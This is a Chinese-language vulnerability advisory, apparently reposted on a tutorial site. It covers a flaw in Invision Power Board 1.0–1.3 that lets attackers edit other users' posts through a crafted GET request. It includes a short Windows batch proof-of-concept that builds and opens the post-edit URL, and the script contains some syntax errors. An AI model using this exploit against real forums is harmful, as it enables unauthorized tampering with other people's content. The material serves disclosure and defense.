| Invision Power Board非授权访问漏洞 |
|
| Invision Power Board非授权访问漏洞 |
|
| |
|
受影响系统:
Invision PS Invision Board 1.3 Final
Invision PS Invision Board 1.3
Invision PS Invision Board 1.2
Invision PS Invision Board 1.1.2
Invision PS Invision Board 1.1.1
Invision PS Invision Board 1.0.1
Invision PS Invision Board 1.0
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 13802
Invision Power Board是一款流行的PHP论坛程序。
Invision Power Board中存在非授权访问漏洞。攻击者可以通过HTTP GET请求未经充分认证就编辑其他用户的论坛张贴。
<*来源:V[i]RuS (virusishacker@gmail.com)
链接:http://forums.invisionpower.com/index.php?showtopic=168016
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
echo off
cls
title Ipb Edit Bug
color a
echo enter url(example:www.example.com):
set /p %url%=
echo enter Folder(example:/forums):
set /p %Folder%=
echo enter Forum id(example:5) you are moderating:
set /p %forumid%=
echo enter topic id(example:103226) you want to edit:
set /p %topicid%=
echo enter p=num(example:760594) id you want to edit:
set /p %pnum%=
echo enter any key to go the edit post page...
pause
start iexplore.exe %url%forumid%/
index.php?act=Post&CODE=08&f=%forumid%&t=%topicid%&p=%pnum%
建议:
--------------------------------------------------------------------------------
厂商补丁:
Invision PS
-----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.invisionboard.com/ |
 |
频道声明:本频道的文章除部分特别声明禁止转载的专稿外,可以自由转载.但请务必注明出出处和原始作者 文章版权归本频道与文章作者所有.对于被频道转载文章的个人和网站,我们表示深深的谢意。
| 原始作者:佚名 |
录入时间:2006-11-3 |
| 信息来源:不详 |
投稿信箱:itqoo@126.com |
|
|
 |
|
|
| 教程录入:admin 责任编辑:admin |
|
上一个教程: WebLogic管理控制台登陆页面跨站脚本漏洞
下一个教程: Calendarix CalPath远程文件包含漏洞 |
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
用户登录 
新用户注册 
网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) 